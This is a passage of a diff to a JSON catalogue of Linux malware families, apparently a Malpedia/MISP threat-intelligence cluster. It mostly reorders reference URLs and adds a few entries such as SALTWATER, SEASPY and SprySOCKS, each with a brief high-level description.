"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf" ], "synonyms": [], "type": [] @@ -5959,13 +6216,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei", - "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://twitter.com/IntezerLabs/status/1338480158249013250", "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html", "https://cujo.com/iot-malware-journals-prometei-linux/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://twitter.com/IntezerLabs/status/1338480158249013250", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] @@ -5978,8 +6235,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean", - "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/", - "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/" + "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/", + "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/" ], "synonyms": [], "type": [] @@ -6002,22 +6259,22 @@ "value": "pupy (ELF)" }, { - "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", + "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", + "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/", + "https://www.qnap.com/en/security-advisory/QSA-20-02", + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", + "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/", + "https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/", "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.anomali.com/blog/the-ech0raix-ransomware", - "https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/", - "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/", - "https://www.qnap.com/en/security-advisory/QSA-20-02", "https://www.ibm.com/downloads/cas/Z81AVOY7", - "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf", - "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/" + "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [ "eCh0raix" @@ -6032,11 +6289,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch", - "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html", - "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", - "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", - "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf", "https://bin.re/blog/the-dga-of-qsnatch/", + "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", + "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", + "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html", "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf" ], "synonyms": [], @@ -6077,9 +6334,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ragnarlocker", + "https://twitter.com/malwrhunterteam/status/1475568201673105409", "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://twitter.com/malwrhunterteam/status/1475568201673105409" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf" ], "synonyms": [], "type": [] @@ -6092,8 +6349,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22", - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22" ], "synonyms": [], "type": [] @@ -6102,28 +6359,29 @@ "value": "Rakos" }, { - "description": "", + "description": "According to SentineOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195", - "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf" + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", + "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.sentinelone.com/anthology/ransomexx/", + "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "Defray777" @@ -6139,8 +6397,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rapper_bot", "https://socradar.io/linux-malware-rapperbot-brute-forcing-ssh-servers/", - "https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks", - "https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery" + "https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery", + "https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks" ], "synonyms": [], "type": [] @@ -6205,9 +6463,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert", - "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html" + "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/" ], "synonyms": [ "N13V" @@ -6218,19 +6476,20 @@ "value": "RedAlert Ransomware" }, { - "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm", + "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", - "https://vms.drweb.com/virus/?i=7754026&lng=en", + "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt", + "https://asec.ahnlab.com/en/55229/", "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/", "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", - "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", "https://sansec.io/research/rekoobe-fishpig-magento", - "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", "https://twitter.com/billyleonard/status/1458531997576572929", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt" + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://vms.drweb.com/virus/?i=7754026&lng=en" ], "synonyms": [], "type": [] @@ -6243,9 +6502,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile", + "https://asec.ahnlab.com/en/55785/", "https://github.com/f0rb1dd3n/Reptile", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf" + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] @@ -6258,58 +6518,58 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil", - "https://www.youtube.com/watch?v=mDUMpYAOMOo", - "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", - "https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://malienist.medium.com/revix-linux-ransomware-d736956150d0", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", - "https://home.treasury.gov/news/press-releases/jy0471", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", - "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", - "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", - "https://ke-la.com/will-the-revils-story-finally-be-over/", - "https://angle.ankura.com/post/102hcny/revix-linux-ransomware", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", - "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", - "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", - "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", - "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", - "https://analyst1.com/file-assets/History-of-REvil.pdf", - "https://www.flashpoint-intel.com/blog/revil-disappears-again/", - "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", - "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", - "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", + "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", "https://threatpost.com/ransomware-revil-sites-disappears/167745/", - "https://www.bbc.com/news/technology-59297187", - "https://github.com/f0wl/REconfig-linux", - "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", - "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", - "https://twitter.com/IntezerLabs/status/1452980772953071619", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://www.youtube.com/watch?v=ptbNMlWxYnE", - "https://twitter.com/VK_Intel/status/1409601311092490248?s=20", - "https://twitter.com/VK_Intel/status/1409601311092490248", + "https://home.treasury.gov/news/press-releases/jy0471", + "https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5", "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/", - "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", - "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://twitter.com/IntezerLabs/status/1452980772953071619", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil", + "https://angle.ankura.com/post/102hcny/revix-linux-ransomware", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://ke-la.com/will-the-revils-story-finally-be-over/", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://malienist.medium.com/revix-linux-ransomware-d736956150d0", + "https://twitter.com/VK_Intel/status/1409601311092490248", + "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", + "https://www.bbc.com/news/technology-59297187", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", + "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", + "https://www.youtube.com/watch?v=mDUMpYAOMOo", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", + "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", + "https://analyst1.com/file-assets/History-of-REvil.pdf", + "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", + "https://www.flashpoint-intel.com/blog/revil-disappears-again/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", + "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", + "https://github.com/f0wl/REconfig-linux", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment" + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.youtube.com/watch?v=ptbNMlWxYnE", + "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", + "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", + "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", + "https://twitter.com/VK_Intel/status/1409601311092490248?s=20", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", + "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/" ], "synonyms": [ "REvix" @@ -6364,9 +6624,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro", - "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/", + "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/", "https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro", - "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/" + "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/" ], "synonyms": [], "type": [] @@ -6379,8 +6639,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom", - "https://unit42.paloaltonetworks.com/royal-ransomware/", - "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html" + "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://unit42.paloaltonetworks.com/royal-ransomware/" ], "synonyms": [ "Royal", @@ -6404,17 +6665,31 @@ "uuid": "4947e9d3-aa13-4359-ac43-c1c436c409c9", "value": "Rshell" }, + { + "description": "According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv, close syscalls via the 3rd party kubo/funchook hooking library, and amounts to five components, most of which are referred to as \"Channels\" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.saltwater", + "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d55ea436-b2c1-400c-99dc-6e35bc05438b", + "value": "SALTWATER" + }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", - "https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/", - "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", - "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/", + "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", + "https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/", + "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/" ], "synonyms": [], @@ -6428,9 +6703,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sbidiot", + "https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/", "https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/", - "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/", - "https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/" + "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/" ], "synonyms": [], "type": [] @@ -6438,6 +6713,22 @@ "uuid": "b4c20cf4-8e94-4523-8d48-7781aab6785d", "value": "SBIDIOT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.seaspy", + "https://www.cisa.gov/news-events/analysis-reports/ar23-209b", + "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", + "https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a6699c42-69d8-4bdd-8dd9-72f4c80efefa", + "value": "SEASPY" + }, { "description": "", "meta": { @@ -6469,7 +6760,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sidewalk", - "https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/" + "https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" ], "synonyms": [], "type": [] @@ -6511,9 +6803,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sowat", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", "https://twitter.com/billyleonard/status/1417910729005490177", - "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003", "https://twitter.com/bkMSFT/status/1417823714922610689", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003", "https://imp0rtp3.wordpress.com/2021/11/25/sowat/" ], "synonyms": [], @@ -6553,8 +6846,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter", - "https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/", - "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/" + "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/", + "https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/" ], "synonyms": [], "type": [] @@ -6577,6 +6870,19 @@ "uuid": "df23ae3a-e10d-4c49-b379-2ea2fd1925af", "value": "Speculoos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spry_socks", + "https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3b5c485b-b6a6-4586-a7dc-9e23a3b0aa5a", + "value": "SprySOCKS" + }, { "description": "", "meta": { @@ -6596,12 +6902,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", - "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", - "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/", - 